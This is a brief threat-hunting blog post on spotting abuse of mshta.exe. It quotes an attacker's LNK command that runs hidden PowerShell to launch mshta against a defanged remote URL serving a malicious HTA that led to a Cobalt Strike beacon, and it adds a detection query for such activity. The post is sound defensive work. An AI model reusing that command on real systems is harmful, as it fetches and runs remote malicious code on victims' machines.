342. Mshta - A Great Target for Hunting
Hello everyone!
It's Monday, so let's look at a classic (at least in my opinion) target for threat hunting - System Binary Proxy Execution: Mshta (T1218.005).
I've spotted it again looking through the report on activity cluster we track as Lone Wolf. The adversary leveraged malicious LNK files to deploy Cobalt Strike beacon.
The LNK, for example, runs the following command:
powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'hxxps://iplogger[.]cn/forensicsas.png'"
As you can see, here mshta.exe is used to access a link, which redirects to a malicious HTA file. So, for example, we can search for mshta.exe accessing suspicious links:
event_type: "processcreatewin"
AND
proc_file_path: "mshta.exe"
AND
cmdline: *http*
See you tomorrow!

Comments
Post a Comment